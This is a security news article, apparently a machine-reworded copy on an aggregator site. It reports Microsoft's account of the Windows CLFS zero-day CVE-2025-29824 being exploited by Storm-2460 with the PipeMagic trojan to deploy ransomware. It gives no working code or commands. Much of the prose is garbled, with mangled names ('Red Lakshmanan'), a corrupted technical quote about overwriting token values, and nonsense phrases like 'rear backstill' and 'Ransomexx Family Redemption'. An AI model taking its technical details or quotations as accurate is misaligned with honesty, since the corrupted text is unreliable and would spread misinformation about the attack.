Close Menu
Indo Guard OnlineIndo Guard Online
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
What's Hot

More than 70 organizations in several sectors aimed at Chinese Cyber ​​Spying Group

June 9, 2025

Two different botnets exploit the vulnerability of the WAZUH server to launch attacks based on peaceful

June 9, 2025

Think what your IDP or CASB covers the shadow? These 5 risks prove differently

June 9, 2025
Facebook X (Twitter) Instagram
Facebook X (Twitter) Instagram YouTube
Indo Guard OnlineIndo Guard Online
Subscribe
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
Indo Guard OnlineIndo Guard Online
Home » Pipemagic Trojan exploits Window’s vulnerability
Global Security

Pipemagic Trojan exploits Window’s vulnerability

AdminBy AdminApril 9, 2025No Comments3 Mins Read
Windows CLFS Zero-Day Vulnerability to Deploy Ransomware
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link


09 April 2025Red LakshmananVulnerability / ransom

Windows Clfs zero vulnerability per day for deployment programs

Microsoft has found that now a turning lack of security that affects the usual Windows file file (CLFS) was used as a zero day in ransom attacks aimed at a small number of goals.

“Objectives include organizations in information technology (IT) and US real estate sector, financial sector in Venezuela, Spanish software and retail in Saudi Arabia,” technological giant – Note.

The vulnerability in question is the CVE-2025-29824, the privilege of the escalation in CLF, which can be used to achieve the privileges of the system. It was Redmond’s fixed As part of the patch upgrade on Tuesday for April 2025.

Microsoft monitors the activity and operation of the Post-Compromise Cve-2025-29824 under the nickname Storm-2460, with the threat subjects also use malicious software called Pipemagic to deliver the feat as well as useful loads.

Cybersecurity

The exact initial access vector used in the attacks is currently unknown. However, the actors of the threat were observed using Certutil utilities to download malicious programs from a third -party legal site, which was previously compromised for useful loads.

Malicious software – it’s malicious File MSBUILD This contains an encrypted useful load, which is then unpacked to launch Pipemagic, Trojan, which has been discovered in the wild since 2022.

It is worth noting here that the CVE-2025-29824-two lack of zero day Windows, which will be delivered via Pipemagic Cve-2025-24983The Windows Win32 subsystem subsystem that was marked by ESET and fixed Microsoft last month.

Previously, Pipemagic was also observed in connection with Nokoyawa ransom attacks that exploit another lack of zero day Clfs (Cve-2023-28252).

“In some other attacks we attribute to the same actor, we also noticed that before using the CLFS height vulnerability, the victim’s machines were infected to order a modular rear backstill – noted In April 2023.

It is important to note that Windows 11, 24H2 version, does not affect this specific operation because access to certain system information classes inside NtquerySteminformation limited to users with Safety privilegethat is usually only Users similar to the administrator can get.

“The expluent is aimed at vulnerability in the CLFS kernel driver,” Microsoft’s intelligence group explained. “The memory corruption and API RTLSETALLBITS are then used to overwrite the 10xfffffff of the 10xffffff of the process, which allows all privileges for the process, which allows you to be injected into system processes.”

Cybersecurity

Successful exploitation is accompanied by an actor at a threat that takes out the powers of users, dropping the memory of LSASS and file encryption into the system with random expansion.

Microsoft said Ransomexx Family Redemption.

“The ransom threat evaluates the increase in the privileges of feats, because it can allow them to remake their original access, including distributors of commodity malware in privileged access,” Microsoft said. “They then use privileged access to extensive deployment and detonation of compelling programs in the environment.”

Found this article interesting? Keep track of us further Youter  and LinkedIn To read more exclusive content we publish.





Source link

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Admin
  • Website

Related Posts

More than 70 organizations in several sectors aimed at Chinese Cyber ​​Spying Group

June 9, 2025

Two different botnets exploit the vulnerability of the WAZUH server to launch attacks based on peaceful

June 9, 2025

Think what your IDP or CASB covers the shadow? These 5 risks prove differently

June 9, 2025

Openai prohibits chatgpt accounts used by Russian, Iranian and Chinese hacking groups

June 9, 2025

Operation malicious network supply software gets to NPM and Pypi ecosystems, focusing on millions worldwide

June 8, 2025

Extension of the malicious browser has infected 722 users across Latin America since the beginning of 2025

June 8, 2025
Add A Comment
Leave A Reply Cancel Reply

Loading poll ...
Coming Soon
Do You Like Our Website
: {{ tsp_total }}

Subscribe to Updates

Get the latest security news from Indoguardonline.com

Latest Posts

More than 70 organizations in several sectors aimed at Chinese Cyber ​​Spying Group

June 9, 2025

Two different botnets exploit the vulnerability of the WAZUH server to launch attacks based on peaceful

June 9, 2025

Think what your IDP or CASB covers the shadow? These 5 risks prove differently

June 9, 2025

Openai prohibits chatgpt accounts used by Russian, Iranian and Chinese hacking groups

June 9, 2025

Operation malicious network supply software gets to NPM and Pypi ecosystems, focusing on millions worldwide

June 8, 2025

Extension of the malicious browser has infected 722 users across Latin America since the beginning of 2025

June 8, 2025

New company Atomic MacOS Campation Exploaits Clickfix to focus on Apple users

June 6, 2025

Microsoft helps CBI disassemble the Indian Centers for Japanese Technical Support

June 6, 2025
About Us
About Us

Provide a constantly updating feed of the latest security news and developments specific to Indonesia.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

More than 70 organizations in several sectors aimed at Chinese Cyber ​​Spying Group

June 9, 2025

Two different botnets exploit the vulnerability of the WAZUH server to launch attacks based on peaceful

June 9, 2025

Think what your IDP or CASB covers the shadow? These 5 risks prove differently

June 9, 2025
Most Popular

In Indonesia, crippling immigration ransomware breach sparks privacy crisis

July 6, 2024

Why Indonesia’s Data Breach Crisis Calls for Better Security

July 6, 2024

Indonesia’s plan to integrate 27,000 govt apps in one platform welcomed but data security concerns linger

July 6, 2024
© 2025 indoguardonline.com
  • Home
  • About us
  • Contact us
  • Privacy Policy

Type above and press Enter to search. Press Esc to cancel.